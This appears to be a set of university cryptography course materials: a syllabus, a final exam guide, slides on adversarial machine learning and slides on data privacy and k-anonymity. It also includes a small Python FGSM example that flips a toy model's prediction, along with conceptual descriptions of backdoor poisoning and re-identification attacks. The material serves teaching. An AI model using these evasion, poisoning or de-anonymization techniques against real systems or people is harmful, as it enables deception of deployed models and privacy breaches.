Cis4520 All Lecture Notes and Assignments

CIS 4520 is an undergraduate course on Cryptography taught by Dr. Wenjing Zhang at the University of Guelph, covering fundamental concepts in information security, cryptography techniques, and their applications. The course includes a project, assignments, and a final exam, with a focus on academic integrity and collaboration among students. Key topics include symmetric and public key cryptography, authentication, and network security, with a tentative schedule outlining various subjects to be covered throughout the semester.


Introduction to Cryptography

CIS 4520
Course Introduction

Instructor: Dr. Wenjing Zhang
[email protected]
School of Computer Science
University of Guelph
Welcome

Welcome to CIS 4520 Introduction to Cryptography

Course introduction
People
Schedule and Topics
Tasks and grading

Why CIS 4520?

A. Security is one of the most popular areas in CS
B. Broader impacts…
C. Covers a broad spectrum of topics
D. Looks good on your resume
E. I will hack the computers/websites of my friends
   No you won’t!
Why CIS 4520?

This course is for
Undergraduate CS/EE students
Students who want to learn the basics of information security
Who’s who?
Education & Research Experience
• Instructor: Dr. Wenjing Zhang (she/her/hers)
• Doctor of Philosophy (Ph.D.) in Computer Science, Dec. 2023
  School of Computer Science, University of Guelph, Canada
  Advisor: Dr. Xiaodong Lin, Professor, IEEE Fellow
• Visiting Research Scholar, Oct. 2016 – Oct. 2018
  Department of Electrical & Computer Engineering, University of Arizona, USA
  Advisors: Dr. Ming Li, Associate Professor, IEEE Fellow, NSF CAREER Award; Dr. Ravi Tandon, Associate Professor, NSF CAREER Award
• Research Interest: Intersection of Cybersecurity and AI
Scholarly Trajectory

2019: IEEE Transactions on Information Forensics and Security (TIFS)
2020: Computers & Security; IEEE Transactions on Communications
2022: IEEE Transactions on Information Forensics and Security (TIFS); IEEE Transactions on Dependable and Secure Computing (TDSC); Computers & Security
2023: NeurIPS

My past research has been published in top conferences and journals in the field of AI, Machine Learning, and Cybersecurity, including NeurIPS 2023, IEEE TIFS, and TDSC.
Who’s who?

GTA: Vaideeshwaran Saravanan (Eashwar)
Master’s student, School of Computer Science, University of Guelph
E-mail: [email protected]
Time and location
Class: T/Th 5:30 PM – 6:50 PM, In Person, Guelph, Rozanski Hall 105
Instructor Office Hours: Thursdays 10:30 AM – 11:30 AM, Guelph, J.D. MacLachlan Room 211
GTA Office Hours: Tuesdays 3:00 PM – 4:00 PM, Guelph, Reynolds Building Room 0003
Course materials: required textbook

Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education. (ISBN 10: 1-292-15858-1.)

Lecture notes (pdf) will be posted on CourseLink.

ASSIGNMENTS and FINAL EXAM will be based on the lecture notes and supplemental reading materials.

PROJECT will be based on the combination of research, implementation, and experimentation.
Course materials: recommended textbooks

Several textbooks that might be helpful are listed below:

Cryptography: Theory and Practice, Douglas Stinson, 3rd Edition, Prentice Hall, 2005 (more suitable for graduate students).
Introduction to Modern Cryptography, J. Katz and Y. Lindell, Chapman & Hall/CRC, 2014.
Handbook of Applied Cryptography, A. Menezes, P. Van Oorschot, S. Vanstone, CRC Press, 1996. Available online.
The Joy of Cryptography, Mike Rosulek, Oregon State University, 2017. Available online.
Prerequisites

Math: number theory, linear algebra, probability
Programming: Python, C, etc.
CS (basics): computer networking, databases, web
Schedule (tentative)

Introduction to Information Security
Classical Encryption Techniques
Measures of Security and Ideal Cryptosystems
Symmetric Key Cryptography
Public Key Cryptosystems
Message Integrity and Authentication
Key Management and Distribution
User Authentication
Network and Web Security
Tasks and Grading

Project: 40%
Assignment: 30% (equally distributed over 3 assignments)
Examination: 25% (one final exam)
Class participation: 5% (participate in in-class Tophat quizzes)
Policies

Plagiarism and Academic Integrity!
https://guides.lib.uoguelph.ca/academicintegrity

The University of Guelph is committed to the highest standards of academic integrity and honesty. Students are expected to be familiar with these standards and must abide by the applicable policies (see The Academic Misconduct Policy in the Undergraduate Calendar).

The Academic Misconduct Policy is detailed in the Undergraduate Calendar:
http://www.uoguelph.ca/registrar/calendars/undergraduate/current/c08/c08-amisconduct.shtml
Policies

Academic Integrity

Your work will be manually graded and checked with plagiarism detection software.

Make proper citations!!
Rule of thumb: make it clear (to the grader) which parts are your contribution and which come from the literature.

If you are unsure, it’s probably NOT OK!
If you are unsure, ask before you do it!
Policies
Discussion and collaboration
You are absolutely encouraged to discuss your homework assignments and projects with your classmates.
Each student should write down their own solution.
Team competition: no discussion!
You are responsible for all your work.

For assignments and projects resulting from discussion, please always acknowledge other people’s contribution by including a sentence at the beginning of the hand-in saying “I discussed the assignment (project) with XXX (include more names if necessary)”. There is absolutely NO penalty for doing so.
Assignment Late Policy

Assignments should be submitted through CourseLink.
Late assignments will lose 10% of the total possible for each day they are late.
NO assignment will be accepted that is more than 2 days late.

Exceptions
Before deadline: instructor’s approval
After deadline: emergency only
What will you learn in this class?

Fundamentals of information security
“A little bit of everything”
Theoretical knowledge
Basic cryptography
  What is public-private key cryptography?
Important concepts in security and privacy
  What is a man-in-the-middle attack?
  What is a SQL injection attack?
The “why”s behind many security designs/features
How to protect?
What you will not learn…

We will not cover the system administration aspects of security
  E.g. how to configure users, groups and access rights in Windows OS.
We will not cover the management aspects of security
  E.g. corporate security strategic planning, security policies, etc.
These topics are important, but we do not have time to cover them.
Project
Combine research, implementation, and experimentation with a
topic of interest.

You can work on teams of two people of your own choosing; you
may also work on your own if you wish to.

Deliverables:
Project proposal
‒ Due: Friday, January 26 2024, 11:59PM EST
Midterm report discussion
‒ Due: Tuesday, February 27 2024
Pre-recorded presentation & demonstration video
‒ Due: Friday, April 5 2024, 11:59PM EST
Final report & code
‒ Due: Friday, April 12 2024, 11:59PM EST.

Suggested Project Topics
You may propose your own

AI security
Data privacy
Database security
Computer systems security
Network security
Internet and web security & privacy
Cloud security
Social engineering

It is recommended to review the project resources before starting your project.
Introduce Yourself

Name
Year and Major
What are you expecting to learn from the course?

Questions?
CIS 4520 Introduction to Cryptography, Winter 2024
Final Exam Preparation Guide

Instructor: Dr. Wenjing Zhang

1 Instructions

Exam Date: Thursday, April 18 2024, 8:30 AM - 10:30 AM EST (In-Person).
Location: To be announced.
Format: The format of the exam questions will be similar to Assignment 3. The exam is open book
and open notes. Laptops are allowed in airplane mode only. Connecting to a network during the exam is
strictly prohibited and constitutes a violation of academic integrity. Students are subject to the University
of Guelph’s Academic Misconduct Policy.
Note: Please write your answers in the space allocated in this printed exam. Please ensure answers are neat
and legible. Illegible answers may be given no points. After completing the exam, please use CamScanner,
an app on your phone, to scan and upload the answers to CourseLink for grading.

Total Points: 20 points.

2 Review Topics

It is important to have a deep understanding of the principles and concepts you have learned from this
course, as well as knowing how to apply them in scenarios relevant to information and network security.
The topics listed below are considered fundamental in this course, and each of them might be tested in the
final exam. Reviewing the lecture notes and assignments would be helpful.

– Introduction to Information and Network Security:


• Understand the basic goals of information and network security, such as confidentiality, integrity,
authentication, non-repudiation, availability, etc.
• What are the common threat/attack models: passive and active attacks, identify the security attacks
in terms of the violations of the security services.
– Introduction to Cryptography
• Classical cryptography and common terminology: Schematic of a secure communication over an
insecure channel.
• Basic modular arithmetic, such as modular addition, multiplication, exponentiation, Euler’s totient
theorem, Euclid’s algorithm, extended Euclidean algorithm, etc.
• Early ciphers: Shift, Substitution, Vigenere, Permutation, One-time pad, etc. Understand block and
stream ciphers.
• Cryptanalysis: Index of Coincidence.
• Three types of Cryptography: Secret key, Public key, Hash functions. What security goals are they
able to achieve, respectively? And how do they do it?
– Shannon’s Approach to Cryptography:
• Basic probability calculations.
• Perfect secrecy: equivalent definitions, and how to test whether a cryptosystem is perfectly secure.
• One-time pad: construction, XOR operation, and why it is perfectly secure, pros and cons.
– Symmetric Key Cryptography:
• Substitution-permutation networks: general structure and why do we need it.
• DES: The feistel structure, form of round function (S-Boxes and permutation), the key length of
DES; How to make more secure DES? – Triple DES, meet-in-the-middle attack, and how is Triple
DES designed, why?
• Five modes of encryption (how to encrypt large messages), their pros and cons, how to protect the
message integrity using message authentication codes (MACs).
– Hashes and Message Digest:
• The desired properties of cryptographic hash functions: one-way property, collision resistance, and
randomness, why are they needed?
• Understand how to construct secure keyed hash function.
• Applications of hash functions: e.g., integrity check, authentication, commitment protocols, encryption, etc. How to securely combine hash with encryption to achieve both confidentiality and authentication/integrity protection.
– Public Key Cryptography
• The basic concepts of public key cryptography, including public key encryption and signatures, what
security properties they can achieve.
• The RSA cryptosystem: know how public/private keys are generated; how to use public/private
keys to encrypt/decrypt messages; cryptanalysis of RSA; the vulnerabilities of textbook RSA.
• Digital signature schemes: security requirements, construction, possible attacks, hash and then sign.
• Applications of digital signatures – basic applications, and how to securely combine signature with
encryption to achieve both confidentiality and authentication/integrity protection.
– Key Management:
• Key pre-distribution: KDCs and CAs: why are they needed? How to do key distribution/management with KDCs or CAs? What information is included in a ticket/certificate?
• Session key establishment, Diffie-Hellman key agreement: how does it work, why it’s secure against
eavesdroppers, why not secure against Man-in-the-Middle attacks? How to fix it?
• The public key infrastructure; certificate chains: how to find a chain of trust in a particular model.
– Authentication:
• An assessment of potential challenges you might encounter and strategies to address them.
• What information is generally used in authentication? What you are, what you have, and what you
know.
• Authentication protocol design principles: concept of one-way and mutual authentication; some
typical designs of symmetric key based and public key based authentication schemes; be familiar
with the known security handshake pitfalls: what are the common attacks? How do they work?
How to defend against them? E.g., replay attack; the role of different types of random numbers. Be
able to reason about the security of simple authentication protocols and fix vulnerabilities; design
simple authentication protocols that are secure under given adversary models and goals.
– Kerberos V4/V5:
• The function of Kerberos and the security services it provides; basic system configuration.
• The authentication mechanisms used in Kerberos Authentication – the concepts of KDC, long-term
authentication key, session key, ticket, ticket-granting ticket, authenticator, credential, etc.
– IPSec:
• Understand the motivation of IPSec – various IP level attacks such as IP spoofing.
• The two protocols in IPSec – AH, ESP. The security services each protocol provides.
• Two operation modes – Transport mode and Tunnel modes. The difference between the two modes
and the suitable application scenarios.
• What process is applied to the packet by AH and ESP, including considerations regarding header
structure?
– SSL/TLS:
• The security services SSL/TLS provide.
• Understand the different mechanisms and protocols used in server authentication and client authentication. Understand how each security goal is achieved in SSL/TLS (e.g., authentication, key establishment, confidentiality, integrity).
• Compare Kerberos, IPSec, and SSL; understand their different scopes of applicability and implementation locations in the TCP/IP protocol stack.
– Firewalls:
• Types of firewalls: Stateless and stateful packet filtering firewall, application-level firewall.
• Firewall rules: understand and apply.
– Intrusion Detection Systems:
• Basic methods: Statistical anomaly detection, signature approaches, rule-based intrusion detection.
• The Base-rate Bayesian Fallacy.
– Software & Web Security:
• Buffer overflows, SQL injection, Cross Site Scripting (XSS): How do they work? How to avoid such
attacks when writing new apps?
• Trojan horses, viruses, worms, rootkits; understand how they work and their differences.
– Privacy
• Statistical Database Privacy: understand the concept of anonymity, common privacy breaches, classical privacy protection techniques.
• Network Anonymity: Understand onion routing and route establishment.
– Important topics in Cybersecurity but not included in the exam:
• Operating System Security
• Machine Learning Security
• Quantum Computing & Post-quantum Cryptography
CIS 4520
Introduction to
Cryptography

Wenjing Zhang
CIS 4520 Introduction to Cryptography
Introduction to Security and Privacy in AI/Machine Learning
Wenjing Zhang
[email protected]
Machine Learning (ML)
• A branch of artificial intelligence that learns from data to make decisions or predictions.
• Data is cheap and abundant (data warehouses, data marts); knowledge is expensive and scarce.
• Example in retail: customer transactions to consumer behavior:
  – People who bought “Da Vinci Code” also bought “The Five People You Meet in Heaven” (Amazon)
  – People who bought beer also bought chips (Walmart)
  – People who like photography also like travel (Google Ads)
Different Types of ML

Supervised Learning
  Objective: map inputs to outputs
  Training data: labeled input-output pairs
  Feedback: immediate label/value
  Model examples: neural networks
  Application: prediction tasks (classification and regression)

Unsupervised Learning
  Objective: discover data patterns
  Training data: unlabeled data
  Feedback: none
  Model examples: clustering models
  Application: pattern discovery (clustering, dimensionality reduction)

Reinforcement Learning
  Objective: maximize cumulative rewards
  Training data: agent-environment interaction (the agent chooses its training data)
  Feedback: delayed scalar reward
  Model examples: Markov Decision Processes
  Application: decision-making in dynamic environments where an agent must perform actions to achieve goals (game AI, robotics)
Important Subfields of ML

Statistical Machine Learning (SML)
  Approach: statistical methods for pattern learning and prediction
  Algorithms: linear regression, decision trees, SVM, etc.
  Representation: uses handcrafted features, often requiring domain knowledge
  Performance & Scalability: requires manual tuning; may struggle with big data
  Interpretability: more interpretable due to simpler models
  Training Data: effective with less data for simpler models

Deep Learning (DL)
  Approach: neural networks that learn data representations through layers
  Algorithms: CNNs, RNNs, etc.
  Representation: automatically learns from raw input, without manual features
  Performance & Scalability: minimal tuning; highly scalable for big data
  Interpretability: less interpretable due to complexity
  Training Data: requires large datasets for optimal performance
Statistical Machine Learning (SML)
• Supervised Learning (Task: classification)
Deep Learning (DL)
• Deep Neural Networks (DNNs)
Machine Learning and Security
• Machine Learning for Security
• Adversarial Machine Learning
Machine Learning for Security
• Using machine learning techniques for
  – Intrusion detection systems (IDS)
  – Anomaly detection
  – Spam filtering
  – Software analysis/testing
  – Virus/malware detection
  – User behavioral analysis
Adversarial Machine Learning
• Explore vulnerabilities of machine learning models to perform adversarial attacks.
• These attacks aim to manipulate or deceive the model by intentionally feeding it misleading or crafted input data, to cause the model to make incorrect predictions or classifications.
Security & Privacy in Machine Learning
Security & privacy risks at each stage within the life cycle of an ML model
Image courtesy of Sony AI
Traffic Sign Recognition
Input image $\mathbf{x}$ (Stop Sign) $\rightarrow$ model $f(\mathbf{x})$ $\rightarrow$ label $l_c = f(\mathbf{x})$
Security Threats in Machine Learning
• Evasion Attacks (Adversarial Examples)
• Backdoor Attacks (Neural Trojans)
• Exploratory Attacks (Model/Data Stealing)
Evasion Attacks (Adversarial Examples)
• Adversarial examples in evasion attacks
  – refer to inputs that are intentionally designed to deceive machine learning models.
  – these inputs could be subtle changes to the image that are imperceptible to humans (i.e., appearing nearly identical to regular data points) but can cause the machine learning model to make incorrect predictions or classifications.
Evasion Attacks (Adversarial Examples)
Stop Sign image + perturbation $= \mathbf{x}'$ $\rightarrow$ $f(\mathbf{x}')$ $\rightarrow$ “Speed Limit 60”, i.e. $f(\mathbf{x}') \ne l_c$
$\mathbf{x}'$ is the adversarial example that looks almost identical to the original to human eyes but is entirely different to the neural network.
Evasion Attacks (Adversarial Examples)
• This illustrates how sensitive machine learning models can be to small changes in their input data.
• Such vulnerability can be exploited to mislead models in critical applications.
Evasion Attacks (Adversarial Examples)
• Recap: how do we train a deep neural network?
  – A loss function is defined, which could be as simple as
    $L(\mathbf{x}, y, w) = f(\mathbf{x}) - y$
    where $\mathbf{x}$ is the input image, $y$ is the label, $w$ are the network weights, and $f$ is the DNN.
Evasion Attacks (Adversarial Examples)
• Recap: how do we train a DNN?
  – Neuron: summation of the outputs of the previous layer multiplied by the weights of the previous layer:
  – Activation function:
Evasion Attacks (Adversarial Examples)
• Recap: how do we train a deep neural network?
  – Gradient descent: $w' = w - \alpha \nabla_w L(\mathbf{x}, y, w)$, where $\alpha$ is the learning rate.
    The gradient of the loss with respect to $w$ gives us the direction in which we should adjust our parameters to reduce the loss.

Image Credit: Oscar Knagg, Know your enemy–Why adversarial examples are more important than you realize
https://towardsdatascience.com/know-your-enemy-the-fascinating-implications-of-adversarial-examples-5936bccb24af
Evasion Attacks (Adversarial Examples)
• Recap: how do we train a deep neural network?
  – Apply the same gradient idea to the sample instead of the weights (the step now increases the loss):
    $\mathbf{x}' = \mathbf{x} + \epsilon\,\mathrm{sign}\big(\nabla_{\mathbf{x}} L(\mathbf{x}, y, w)\big)$
    where $\mathbf{x}'$ is the adversarial example and $\epsilon$ is the perturbation budget.
Evasion Attacks (Adversarial Examples)
• Small changes (bounded by the perturbation budget) that are imperceptible to human eyes could fool deep learning models:
  $\|\mathbf{x}' - \mathbf{x}\|_p < \epsilon$
• The attack success rate of FGSM-16 could reach 80%+ on the CIFAR and ImageNet datasets.
• Deep neural networks still process visual information in a very different way than human brains.
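The training step and the sign-gradient step from the slides above, worked through on the one-neuron case (logistic regression, a single weighted sum plus activation). This is an added example, not course code: the dataset, the dimension D, the SIGNAL/BUMP/EPS values and all helper names are my own constructions, chosen so that a per-coordinate change of 0.05 (twenty times smaller than the natural variation in the data) is enough to flip the prediction.

```python
"""One-neuron recap of gradient descent, FGSM and the L_inf budget check.
Constructed toy data; not code from the course or the cited article."""
import math

D = 50          # input dimension (assumption)
SIGNAL = 0.03   # per-coordinate class signal (assumption)
BUMP = 1.0      # large per-sample variation on one coordinate (assumption)
EPS = 0.05      # perturbation budget for the L_inf norm (assumption)


def make_dataset():
    """Class 1: signal vector plus a bump on coordinate j; class 0: its mirror.
    The mirror symmetry keeps the bias at zero and all weights equal, so the
    outcome below follows from EPS > SIGNAL alone, not from training luck."""
    data = []
    for j in range(D):
        x1 = [SIGNAL + (BUMP if i == j else 0.0) for i in range(D)]
        data.append((x1, 1))
        data.append(([-v for v in x1], 0))
    return data


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def forward(w, b, x):
    """f(x): weighted sum of the inputs followed by the activation."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)


def loss(w, b, x, y):
    """L(x, y, w): cross-entropy between the neuron output and the label y."""
    p = min(max(forward(w, b, x), 1e-12), 1 - 1e-12)
    return -(y * math.log(p) + (1 - y) * math.log(1 - p))


def grad_w(w, b, x, y):
    """Gradient of L with respect to the weights (and the bias)."""
    p = forward(w, b, x)
    return [(p - y) * xi for xi in x], p - y


def grad_x(w, b, x, y):
    """Gradient of L with respect to the input: the quantity FGSM uses."""
    p = forward(w, b, x)
    return [(p - y) * wi for wi in w]


def train(data, alpha=0.5, steps=200):
    """w' = w - alpha * grad_w L, averaged over the dataset each step."""
    w, b = [0.0] * D, 0.0
    for _ in range(steps):
        gw, gb = [0.0] * D, 0.0
        for x, y in data:
            g, gbi = grad_w(w, b, x, y)
            gw = [a + c for a, c in zip(gw, g)]
            gb += gbi
        n = len(data)
        w = [wi - alpha * gi / n for wi, gi in zip(w, gw)]
        b -= alpha * gb / n
    return w, b


def fgsm(w, b, x, y, eps):
    """x' = x + eps * sign(grad_x L(x, y, w)): the same gradient, applied
    to the sample instead of the weights, so the loss goes up."""
    g = grad_x(w, b, x, y)
    return [xi + eps * ((gi > 0) - (gi < 0)) for xi, gi in zip(x, g)]


def linf_distance(x, x_adv):
    """||x' - x||_inf, the quantity the budget bounds."""
    return max(abs(a - c) for a, c in zip(x, x_adv))


def demo():
    data = make_dataset()
    w, b = train(data)
    x = [SIGNAL] * D                      # a clean class-1 input
    x_adv = fgsm(w, b, x, 1, EPS)
    return {
        "clean_pred": int(forward(w, b, x) > 0.5),
        "adv_pred": int(forward(w, b, x_adv) > 0.5),
        "linf": linf_distance(x, x_adv),
        "loss_clean": loss(w, b, x, 1),
        "loss_adv": loss(w, b, x_adv, 1),
    }


if __name__ == "__main__":
    print(demo())
```

Because the loss is convex in the input for this model, the FGSM step can never lower it; the prediction flips here because the budget exceeds the per-coordinate signal, which is exactly the regime the slide's "small changes" warning is about.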
Security & Privacy in Machine Learning
• Evasion Attacks (Adversarial Examples)
• Backdoor Attacks (Neural Trojans)
• Exploratory Attacks (Model/Data Stealing)
Backdoor Attacks (Neural Trojans)
• Embed hidden triggers into the model
  – These triggers could be specific patterns in the input data or certain conditions that, when met, activate the backdoor behavior.
Triggered input $\mathbf{x}'$ $\rightarrow$ backdoored model $f'(\mathbf{x}')$ $\rightarrow$ “Speed Limit 60”, i.e. $f'(\mathbf{x}') \ne l_c$
Backdoor Attacks (Neural Trojans)
• Data Poisoning Attacks: change the training data
• Model Poisoning Attacks: change the model structure
• Code Poisoning Attacks: change the source code/library
Backdoor Attacks (Neural Trojans)
• Data Poisoning Attacks
  • Pollute the training data
  • Add trigger patterns to benign training images
  • Give adversarial labels to these images
  • Inject adversarial samples into the training dataset

T. Gu, K. Liu, B. Dolan-Gavitt and S. Garg, "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks," in IEEE Access, vol. 7, pp. 47230-47244, 2019, doi: 10.1109/ACCESS.2019.2909068.
Backdoor Attacks (Neural Trojans)
• Model Poisoning Attacks
  • Inject backdoors into the DNN network structure
  • Inject a neural Trojan into the victim DNN
  • Train it with adversarial data (freeze the rest of the DNN)
  • Share the backdoored DNN
Exploratory Attacks (Model/Data Stealing)
Goal: understand and extract information rather than directly cause harm.
Approach: replicate an ML model by testing it with inputs to create a similar model, even without direct access to the original’s internal workings or training data.
Security & Privacy in Machine Learning: Defense
Defense: DNN Sanitization
• Robust Models
  – Adversarial training
• DNN Sanitization/Pruning
  – Fine-pruning [RAID’18]
• DNN Anomaly Detection
  – NeuralCleanse [S&P’19], ABS [CCS’19]
• Input Sanitization
  – Februus [ACSAC’20]
• Backdoor Trigger Detection
  – STRIP [ACSAC’19]
Security and Privacy Conferences
• https://sec-deadlines.github.io/
• S&P (Oakland), Crypto, NDSS, ACM CCS, USENIX Security
CIS 4520 Introduction to Cryptography
Privacy
Wenjing Zhang
[email protected]
Tech Giants Fined for Privacy Breaches
2017 Billboard Campaign by Spotify
• Spotify’s favourite: “Dear person who played ‘Sorry’ 42 times on Valentine’s Day, What did you do?”
• “Dear person in LA who listened to the “Forever Alone” playlist for 4 hours on Valentine’s Day, You OK?”
• “To the 1,235 guys who loved the “Girls Night” playlist this year, We love you.”
• “Dear person in the Theater District who listened to the Hamilton Soundtrack 5,376 times this year, Can you get us tickets?”
Privacy Protection: An Urgent Need
What is Privacy?
• “Privacy” has been studied in computer science for decades.
• “Privacy” is a multi-faceted issue
Databases in Real-world Applications

Medical
  Data collector: Hospital
  Private information: Disease
  Analyst: Epidemiologist
  Function (utility): Correlation between disease and geography

Genome analysis
  Data collector: Hospital
  Private information: Genome
  Analyst: Statistician/Researcher
  Function (utility): Correlation between genome and disease

Advertising
  Data collector: Google/FB
  Private information: Clicks/Browsing
  Analyst: Advertiser
  Function (utility): Number of clicks on an ad by age/region/gender

Social Recommendations
  Data collector: Facebook
  Private information: Friend links / profile
  Analyst: Another user
  Function (utility): Recommend other users or ads to users based on the social network
Massive Real-world Data Collection
• Settings where the data collector may not be trusted (or may not want the liability …)

Location Services
  Data collector: Verizon/AT&T
  Private information: Location
  Function (utility): Traffic prediction

Recommendations
  Data collector: Amazon/Google
  Private information: Purchase history
  Function (utility): Recommendation model

Traffic Shaping
  Data collector: Internet Service Provider
  Private information: Browsing history
  Function (utility): Traffic pattern of groups of users
Social Network Data
• Facebook currently has over 400 million users
• Each of these users specifies details about themselves
• For example:
Source: Raymond Heatherly (The University of Texas at Dallas)
Sample Medical Dataset
• Microdata table
  – Identifier (ID), Quasi-Identifier (QID), Sensitive Attribute (SA)

ID       QID                  SA
Name     Zipcode  Age  Sex   Disease
Alice    47677    29   F     Ovarian Cancer
Betty    47602    22   F     Ovarian Cancer
Charles  47678    27   M     Prostate Cancer
David    47905    43   M     Flu
Emily    47909    52   F     Heart Disease
Fred     47906    47   M     Heart Disease
Location Data
• Location-aware mobile devices
  – iPhone 15, Apple Watch Series 9,
  – Google Pixel 8, Galaxy S23…
• Location-Based Services (LBSs)
• Applications:
  – Public health studies, e.g., disease modeling by the U.S. government
  – Smart transportation, e.g., traffic flow analysis
  – Business strategy planning, e.g., identifying areas where to develop new businesses
Location Privacy Leakage
Research has shown attackers can
• Reconstruct individual location traces within location density
• Uniquely identify users:
  ‒ Home address: College Ave.
  ‒ Occupation: Student of University of Guelph
(Map: University of Guelph, ON)
Location Data Reveal US Military Bases
The Guardian: A US military base in Helmand Province, Afghanistan with routes taken by joggers highlighted by Strava
What is Privacy?
• From the user perspective (privacy concerns)
  – Identity and identifiable information?
    • My SSN
  – Sensitive personal information?
    • My birthdate
  – Information access and information flow?
    • When I post a message on Facebook, who sees the message?
  – Usage of information
    • You can use my income data to approve this credit card, but NOT to send me advertisements.
What is Privacy?
• From the solution perspective (addressing privacy concerns)
  – Anonymity: privacy as protecting the identity
    • Data anonymity: remove identifiable information from data
    • Network anonymity: hide identity on the internet
  – Privacy-preserving data publishing/sharing
    • Identities cannot be recovered from anonymized data
    • Two parties “share” information to compute a function (e.g., the intersection of two lists), but neither party learns the raw data.
  – Privacy-preserving data mining
    • You can learn aggregate data, but not individual records
What is Privacy?
• “Privacy” has been studied in computer science for decades.
• “Privacy” is a multi-faceted issue
• This lecture focuses specifically on two aspects:
  – Part 1. Statistical Database Privacy
    • Remove identifiable information from data
  – Part 2. Network Anonymity
    • Hide identity on the internet
Part 1. Statistical Database Privacy
What is Privacy?
• Privacy as protecting the identity
  – Statistical Database Privacy
    • Remove identifiable information from data
  – Network Anonymity
    • Hide identity on the internet
Data Anonymity
• Privacy
  – Large collections of data: census, survey, social networks, public records, etc.
  – Identifiable information and sensitive attributes.
• Two opposing goals
  – To allow researchers to extract knowledge about the data
  – To protect the privacy of every individual
Data Anonymity
• First attempt: data anonymization
• Remove identifiable attributes from the database
  – Name
  – SSN
  – Address
  – Email
  – Phone number
Data Anonymity
• Microdata table
  – Identifier (ID), Quasi-Identifier (QID), Sensitive Attribute (SA)

ID       QID                  SA
Name     Zipcode  Age  Sex   Disease
Alice    47677    29   F     Ovarian Cancer
Betty    47602    22   F     Ovarian Cancer
Charles  47678    27   M     Prostate Cancer
David    47905    43   M     Flu
Emily    47909    52   F     Heart Disease
Fred     47906    47   M     Heart Disease
Slido: What would you do to attack this dataset?

Data Anonymity
• Latanya Sweeney @ CMU
– Purchased voter’s registration data from Mass. and compared with medical records.
– Successfully identified medical record of Mass. governor
– 87% of the U.S. Population are uniquely identified by {date of birth, gender, ZIP}.

The Netflix Prize (USD 1,000,000)
• The Netflix Prize: who has the best prediction algorithm?
– 100M ratings from 480K users on 17K movies
– Data was (not so) carefully sanitized: anonymized, modified dates, partial data.
– Movie information (title and year) was provided
• Arvind Narayanan and Vitaly Shmatikov, Robust De-anonymization of Large Datasets (How to Break Anonymity of the Netflix Prize Dataset), IEEE S&P 2008.
– Can re-identify users by correlating the anonymized data with publicly available information, particularly from the Internet Movie Database (IMDb).
– Netflix was sued and Netflix Prize II was canceled.
• Anonymization is NOT enough!
Individually Identifiable Information
• Removing identifiers is not enough!

  ID        QID                     SA
  Name      Zipcode  Age  Sex       Disease
  Alice     47677    29   F         Ovarian Cancer
  Betty     47602    22   F         Ovarian Cancer
  Charles   47678    27   M         Prostate Cancer
  David     47905    43   M         Flu
  Emily     47909    52   F         Heart Disease
  Fred      47906    47   M         Heart Disease

Slido: What would you do to protect this dataset?
Classes of Solutions
• Data Obfuscation/Perturbation
– Nobody sees the real data
• Summarization
– Only the needed facts are exposed
• Data Separation
– Data remains with trusted parties

Data Obfuscation/Perturbation
• Goal: Hide the protected information
• Approaches
– Randomly modify data (e.g., add noise)
– Swap values between records
– Controlled modification of data to hide secrets
– Constraints: preserve data utility
• should not change the statistical distribution
• should not interfere with legitimate use of data
• Problems
– Does it really protect the data?
– Can we learn from the results?
Data Obfuscation/Perturbation
• Example: US Census Bureau Public Use of large-scale Microdata
• US Census Bureau summarizes by census block
– Minimum 300 people; ranges rather than values
• For research, “complete” data provided for sample populations
– Identifying information removed; limitation of detail: geographic distinction, continuous intervals; top/bottom coding (eliminate sparse/sensitive values)
– Swap data values among similar individuals: if an individual is determined, the sensitive values are likely incorrect

Data Summarization
• Goal: Make only innocuous/harmless summaries of data available
• Approaches
– Overall collection statistics
– Limited query functionality
• Problems
– Can we deduce data from statistics?
– Is the information sufficient?
Data Summarization
• Example: Statistical Queries
• User is allowed to query protected data
– Queries must use statistical operators (e.g., summation, mean value) that summarize results
• Example: Summation of total income for a group doesn’t disclose individual income
– Multiple queries can be a problem
• Request total salary for all employees of a company
• Request the total salary for all employees but the president
• Now we know the president’s salary

Data Separation
• Goal: Only trusted parties see the data
• Approaches
– Data held by owner/creator
– Limited release to trusted third party
– Operations/analysis performed by trusted party
• Problems
– Will the trusted party be willing to do the analysis? Could be a “bottleneck” as well
– Do the analysis results disclose private information?
k-Anonymity
• The larger the set of indistinguishable entities, the lower the probability of identifying any one of them
– Can be used to “anonymize” a selected private attribute value within the domain of all its possible values

k-Anonymity & Generalization
• k-Anonymity
– Each record is indistinguishable from at least k-1 other records
– These k records form an equivalence class
– k-Anonymity ensures that linking cannot be performed with confidence > 1/k.
• Generalization
– Replace with less-specific but semantically-consistent values
  Zipcode: 47677, 47602, 47678  →  476**
  Age:     29, 22, 27           →  2*
  Sex:     Male, Female         →  *
k-Anonymity & Generalization
• 3-Anonymous table
– Suppose that the adversary knows Alice’s QI values (47677, 29, F).
– The adversary does not know which one of the first 3 records corresponds to Alice’s record.

The Microdata
  QID                      SA
  Zipcode  Age  Sex        Disease
  47677    29   F          Ovarian Cancer
  47602    22   F          Ovarian Cancer
  47678    27   M          Prostate Cancer
  47905    43   M          Flu
  47909    52   F          Heart Disease
  47906    47   M          Heart Disease

The Generalized Table
  QID                      SA
  Zipcode  Age      Sex    Disease
  476**    2*       *      Ovarian Cancer
  476**    2*       *      Ovarian Cancer
  476**    2*       *      Prostate Cancer
  4790*    [43,52]  *      Flu
  4790*    [43,52]  *      Heart Disease
  4790*    [43,52]  *      Heart Disease
k-Anonymity & Generalization
• This is wrong
– 3-anonymity on each quasi-identifier
– Uniquely identifiable on the combination

The Microdata
  QID                 SA
  Zipcode  Age  Sex   Disease
  476**    2*   F     Ovarian Cancer
  476**    2*   M     Ovarian Cancer
  476**    3*   F     Prostate Cancer
  479**    3*   M     Flu
  479**    3*   F     Heart Disease
  479**    2*   M     Heart Disease
k-Anonymity & Generalization
• k-Anonymity does not provide privacy if:
– Sensitive values in an equivalence class lack diversity
– The attacker has background knowledge

A 3-anonymous patient table
  Zipcode  Age   Disease
  476**    2*    Heart Disease
  476**    2*    Heart Disease
  476**    2*    Heart Disease
  4790*    ≥40   Flu
  4790*    ≥40   Heart Disease
  4790*    ≥40   Cancer
  476**    3*    Heart Disease
  476**    3*    Cancer
  476**    3*    Cancer

Homogeneity Attack: Bob (Zipcode 47678, Age 27) falls in the first equivalence class, where every record has Heart Disease.
